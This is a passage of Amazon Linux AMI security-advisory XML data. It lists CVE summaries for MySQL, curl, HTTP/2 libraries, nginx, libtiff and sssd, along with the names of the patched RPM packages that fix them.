Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.6.44 and prior, 5.7.26 and prior and 8.0.16 and prior. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.1 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1731999:
CVE-2019-2739 mysql: Server: Security: Privileges unspecified vulnerability (CPU Jul 2019)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2739" title="" id="CVE-2019-2739" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2740" title="" id="CVE-2019-2740" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2819" title="" id="CVE-2019-2819" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-debuginfo" version="5.6.45" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.45-1.34.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.45" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.45-1.34.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.45" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.45-1.34.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.45" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.45-1.34.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.45" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.45-1.34.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.45" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.45-1.34.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.45" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.45-1.34.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.45" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.45-1.34.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.45" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.45-1.34.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.45" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.45-1.34.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.45" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.45-1.34.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.45" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.45-1.34.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.45" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.45-1.34.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.45" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.45-1.34.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.45" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.45-1.34.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.45" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.45-1.34.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.45" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.45-1.34.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.45" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.45-1.34.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.45" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.45-1.34.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.45" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.45-1.34.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.45" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.45-1.34.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.45" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.45-1.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1297</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1297: medium priority package update for mysql57</title><issued date="2019-09-30 21:02:00" /><updated date="2019-10-02 23:26:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-3822:
libcurl versions from 7.36.0 to before 7.64.0 are vulnerable to a stack-based buffer overflow. The function creating an outgoing NTLM type-3 header (`lib/vauth/ntlm.c:Curl_auth_create_ntlm_type3_message()`), generates the request HTTP header contents based on previously received data. The check that exists to prevent the local buffer from getting overflowed is implemented wrongly (using unsigned math) and as such it does not prevent the overflow from happening. This output data can grow larger than the local buffer if very large &#039;nt response&#039; data is extracted from a previous NTLMv2 header provided by the malicious or broken HTTP server. Such a &#039;large value&#039; needs to be around 1000 bytes or more. The actual payload data copied to the target buffer comes from the NTLMv2 type-2 response header.
A stack-based buffer overflow was found in the way curl handled NTLMv2 type-3 headers. When connecting to a remote malicious server which uses NTLM authentication, the flaw could cause curl to crash.
1670254:
CVE-2019-3822 curl: NTLMv2 type-3 header stack buffer overflow
CVE-2019-2805:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Parser). Supported versions that are affected are 5.6.44 and prior, 5.7.26 and prior and 8.0.16 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1732025:
CVE-2019-2805 mysql: Server: Parser unspecified vulnerability (CPU Jul 2019)
CVE-2019-2740:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: XML). Supported versions that are affected are 5.6.44 and prior, 5.7.26 and prior and 8.0.16 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1732000:
CVE-2019-2740 mysql: Server: XML unspecified vulnerability (CPU Jul 2019)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2740" title="" id="CVE-2019-2740" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2805" title="" id="CVE-2019-2805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3822" title="" id="CVE-2019-3822" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-embedded" version="5.7.27" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.27-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.27" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.27-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.27" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.27-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.27" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.27-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.27" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.27-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.27" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.27-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.27" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.27-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.27" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.27-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.27" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.27-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.27" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.27-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.27" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.27-1.13.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.27" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.27-1.13.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.27" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.27-1.13.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.27" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.27-1.13.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.27" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.27-1.13.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.27" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.27-1.13.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.27" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.27-1.13.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.27" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.27-1.13.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.27" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.27-1.13.amzn1.i686.rpm</filename></package><package name="mysql57-devel" version="5.7.27" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.27-1.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1298</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1298: important priority package update for nghttp2</title><issued date="2019-09-30 21:03:00" /><updated date="2019-10-02 22:59:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9513:
Some HTTP/2 implementations are vulnerable to resource loops, potentially leading to a denial of service. The attacker creates multiple request streams and continually shuffles the priority of the streams in a way that causes substantial churn to the priority tree. This can consume excess CPU.
1735741:
CVE-2019-9513 HTTP/2: flood using PRIORITY frames results in excessive resource consumption
CVE-2019-9511:
Some HTTP/2 implementations are vulnerable to window size manipulation and stream prioritization manipulation, potentially leading to a denial of service. The attacker requests a large amount of data from a specified resource over multiple streams. They manipulate window size and stream priority to force the server to queue the data in 1-byte chunks. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.
1741860:
CVE-2019-9511 HTTP/2: large amount of data requests leads to denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9511" title="" id="CVE-2019-9511" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9513" title="" id="CVE-2019-9513" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nghttp2" version="1.31.1" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/nghttp2-1.31.1-2.5.amzn1.x86_64.rpm</filename></package><package name="libnghttp2" version="1.31.1" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnghttp2-1.31.1-2.5.amzn1.x86_64.rpm</filename></package><package name="libnghttp2-devel" version="1.31.1" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnghttp2-devel-1.31.1-2.5.amzn1.x86_64.rpm</filename></package><package name="nghttp2-debuginfo" version="1.31.1" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/nghttp2-debuginfo-1.31.1-2.5.amzn1.x86_64.rpm</filename></package><package name="libnghttp2-devel" version="1.31.1" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/libnghttp2-devel-1.31.1-2.5.amzn1.i686.rpm</filename></package><package name="nghttp2-debuginfo" version="1.31.1" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/nghttp2-debuginfo-1.31.1-2.5.amzn1.i686.rpm</filename></package><package name="nghttp2" version="1.31.1" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/nghttp2-1.31.1-2.5.amzn1.i686.rpm</filename></package><package name="libnghttp2" version="1.31.1" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/libnghttp2-1.31.1-2.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1299</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1299: important priority package update for nginx</title><issued date="2019-09-30 21:06:00" /><updated date="2019-10-02 22:58:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9516:
Some HTTP/2 implementations are vulnerable to a header leak, potentially leading to a denial of service. The attacker sends a stream of headers with a 0-length header name and 0-length header value, optionally Huffman encoded into 1-byte or greater headers. Some implementations allocate memory for these headers and keep the allocation alive until the session dies. This can consume excess memory.
1741864:
CVE-2019-9516 HTTP/2: 0-length headers lead to denial of service
CVE-2019-9513:
Some HTTP/2 implementations are vulnerable to resource loops, potentially leading to a denial of service. The attacker creates multiple request streams and continually shuffles the priority of the streams in a way that causes substantial churn to the priority tree. This can consume excess CPU.
1735741:
CVE-2019-9513 HTTP/2: flood using PRIORITY frames results in excessive resource consumption
CVE-2019-9511:
Some HTTP/2 implementations are vulnerable to window size manipulation and stream prioritization manipulation, potentially leading to a denial of service. The attacker requests a large amount of data from a specified resource over multiple streams. They manipulate window size and stream priority to force the server to queue the data in 1-byte chunks. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.
1741860:
CVE-2019-9511 HTTP/2: large amount of data requests leads to denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9511" title="" id="CVE-2019-9511" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9513" title="" id="CVE-2019-9513" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9516" title="" id="CVE-2019-9516" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx-mod-http-image-filter" version="1.16.1" release="1.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-image-filter-1.16.1-1.37.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-mail" version="1.16.1" release="1.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-mail-1.16.1-1.37.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-stream" version="1.16.1" release="1.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-stream-1.16.1-1.37.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.16.1" release="1.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.16.1-1.37.amzn1.x86_64.rpm</filename></package><package name="nginx" version="1.16.1" release="1.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.16.1-1.37.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-perl" version="1.16.1" release="1.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-perl-1.16.1-1.37.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.16.1" release="1.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-geoip-1.16.1-1.37.amzn1.x86_64.rpm</filename></package><package name="nginx-all-modules" version="1.16.1" release="1.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-all-modules-1.16.1-1.37.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.16.1" release="1.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-xslt-filter-1.16.1-1.37.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-stream" version="1.16.1" release="1.37.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-stream-1.16.1-1.37.amzn1.i686.rpm</filename></package><package name="nginx-all-modules" version="1.16.1" release="1.37.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-all-modules-1.16.1-1.37.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.16.1" release="1.37.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-xslt-filter-1.16.1-1.37.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-image-filter" version="1.16.1" release="1.37.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-image-filter-1.16.1-1.37.amzn1.i686.rpm</filename></package><package name="nginx" version="1.16.1" release="1.37.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.16.1-1.37.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.16.1" release="1.37.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-geoip-1.16.1-1.37.amzn1.i686.rpm</filename></package><package name="nginx-mod-mail" version="1.16.1" release="1.37.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-mail-1.16.1-1.37.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-perl" version="1.16.1" release="1.37.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-perl-1.16.1-1.37.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="1.16.1" release="1.37.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.16.1-1.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1300</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1300: medium priority package update for mod24_auth_openidc</title><issued date="2019-09-30 21:07:00" /><updated date="2019-10-02 22:56:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-6413:
It was found that mod_auth_openidc did not properly sanitize HTTP headers for certain request paths. A remote attacker could potentially use this flaw to bypass authentication and access sensitive information by sending crafted HTTP requests.
1428855:
CVE-2017-6413 mod_auth_openidc: OIDC_CLAIM and OIDCAuthNHeader not skipped in an "AuthType oauth20" configuration
CVE-2017-6059:
A text injection flaw was found in how mod_auth_openidc handled error pages. An attacker could potentially use this flaw to conduct content spoofing and phishing attacks by tricking users into opening specially crafted URLs.
1425350:
CVE-2017-6059 mod_auth_openidc: Shows user-supplied content on error pages
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6059" title="" id="CVE-2017-6059" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6413" title="" id="CVE-2017-6413" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_auth_openidc-debuginfo" version="1.8.8" release="5.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_openidc-debuginfo-1.8.8-5.5.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_openidc" version="1.8.8" release="5.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_openidc-1.8.8-5.5.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_openidc" version="1.8.8" release="5.5.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_openidc-1.8.8-5.5.amzn1.i686.rpm</filename></package><package name="mod24_auth_openidc-debuginfo" version="1.8.8" release="5.5.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_openidc-debuginfo-1.8.8-5.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1306</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1306: medium priority package update for libtiff</title><issued date="2019-10-08 21:06:00" /><updated date="2019-10-09 23:11:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-8905:
In LibTIFF 4.0.9, a heap-based buffer overflow occurs in the function LZWDecodeCompat in tif_lzw.c via a crafted TIFF file, as demonstrated by tiff2ps.
99999:
CVE-2018-8905 libtiff: heap-based buffer overflow in tif_lzw.c:LZWDecodeCompat() allows for denial of service
CVE-2018-7456:
A NULL Pointer Dereference occurs in the function TIFFPrintDirectory in tif_print.c in LibTIFF 4.0.9 when using the tiffinfo tool to print crafted TIFF information, a different vulnerability than CVE-2017-18013. (This affects an earlier part of the TIFFPrintDirectory function that was not addressed by the CVE-2017-18013 patch.)
99999:
CVE-2018-7456 libtiff: NULL pointer dereference in tif_print.c:TIFFPrintDirectory() causes a denial of service
CVE-2018-18661:
An issue was discovered in LibTIFF 4.0.9. There is a NULL pointer dereference in the function LZWDecode in the file tif_lzw.c.
99999:
CVE-2018-18661 libtiff: tiff2bw tool failed memory allocation leads to crash
CVE-2018-18557:
LibTIFF 4.0.9 (with JBIG enabled) decodes arbitrarily-sized JBIG into a buffer, ignoring the buffer size, which leads to a tif_jbig.c JBIGDecode out-of-bounds write.
99999:
CVE-2018-18557 libtiff: Out-of-bounds write in tif_jbig.c
CVE-2018-17101:
An issue was discovered in LibTIFF 4.0.9. There are two out-of-bounds writes in cpTags in tools/tiff2bw.c and tools/pal2rgb.c, which can cause a denial of service (application crash) or possibly have unspecified other impact via a crafted image file.
99999:
CVE-2018-17101 libtiff: Two out-of-bounds writes in cpTags in tools/tiff2bw.c and tools/pal2rgb.c
CVE-2018-17100:
An issue was discovered in LibTIFF 4.0.9. There is a int32 overflow in multiply_ms in tools/ppm2tiff.c, which can cause a denial of service (crash) or possibly have unspecified other impact via a crafted image file.
99999:
CVE-2018-17100 libtiff: Integer overflow in multiply_ms in tools/ppm2tiff.c
CVE-2018-12900:
Heap-based buffer overflow in the cpSeparateBufToContigBuf function in tiffcp.c in LibTIFF 4.0.9 allows remote attackers to cause a denial of service (crash) or possibly have unspecified other impact via a crafted TIFF file.
99999:
CVE-2018-12900 libtiff: Heap-based buffer overflow in the cpSeparateBufToContigBuf function resulting in a denial of service or possibly code execution
CVE-2018-10963:
The TIFFWriteDirectorySec() function in tif_dirwrite.c in LibTIFF through 4.0.9 allows remote attackers to cause a denial of service (assertion failure and application crash) via a crafted file, a different vulnerability than CVE-2017-13726.
99999:
CVE-2018-10963 libtiff: reachable assertion in TIFFWriteDirectorySec function in tif_dirwrite.c
CVE-2018-10779:
An integer overflow has been discovered in libtiff in TIFFSetupStrips:tif_write.c, which could lead to a heap-based buffer overflow in TIFFWriteScanline:tif_write.c. An attacker may use this vulnerability to corrupt memory or cause Denial of Service.
99999:
CVE-2018-10779 libtiff: heap-based buffer over-read in TIFFWriteScanline function in tif_write.c
CVE-2016-3186:
Buffer overflow in the readextension function in gif2tiff.c in LibTIFF 4.0.6 allows remote attackers to cause a denial of service (application crash) via a crafted GIF file.
99999:
CVE-2016-3186 libtiff: buffer overflow in gif2tiff
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3186" title="" id="CVE-2016-3186" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10779" title="" id="CVE-2018-10779" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10963" title="" id="CVE-2018-10963" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12900" title="" id="CVE-2018-12900" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17100" title="" id="CVE-2018-17100" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17101" title="" id="CVE-2018-17101" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18557" title="" id="CVE-2018-18557" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18661" title="" id="CVE-2018-18661" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7456" title="" id="CVE-2018-7456" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8905" title="" id="CVE-2018-8905" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-static" version="4.0.3" release="32.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-32.34.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="32.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-32.34.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="32.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-32.34.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="32.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-32.34.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="32.34.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-32.34.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="32.34.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-32.34.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="32.34.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-32.34.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="32.34.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-32.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1307</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1307: medium priority package update for sssd</title><issued date="2019-10-08 21:07:00" /><updated date="2019-10-09 23:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-3811:
A vulnerability was found in sssd where, if a user was configured with no home directory set, sssd would return &#039;/&#039; (the root directory) instead of &#039;&#039; (the empty string / no home directory). This could impact services that restrict the user&#039;s filesystem access to within their home directory through chroot().
99999:
CVE-2019-3811 sssd: fallback_homedir returns &#039;/&#039; for empty home directories in passwd file
CVE-2018-16838:
A flaw was found in sssd Group Policy Objects implementation. When the GPO is not readable by SSSD due to a too strict permission settings on the server side, SSSD will allow all authenticated users to login instead of denying access.
99999:
CVE-2018-16838 sssd: improper implementation of GPOs due to too restrictive permissions
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16838" title="" id="CVE-2018-16838" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3811" title="" id="CVE-2019-3811" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sssd-tools" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-tools-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-ipa" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ipa-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-krb5" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-devel-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-winbind-idmap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-winbind-idmap-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd" version="1.16.4" release="21.25.amzn1" epoch="0" 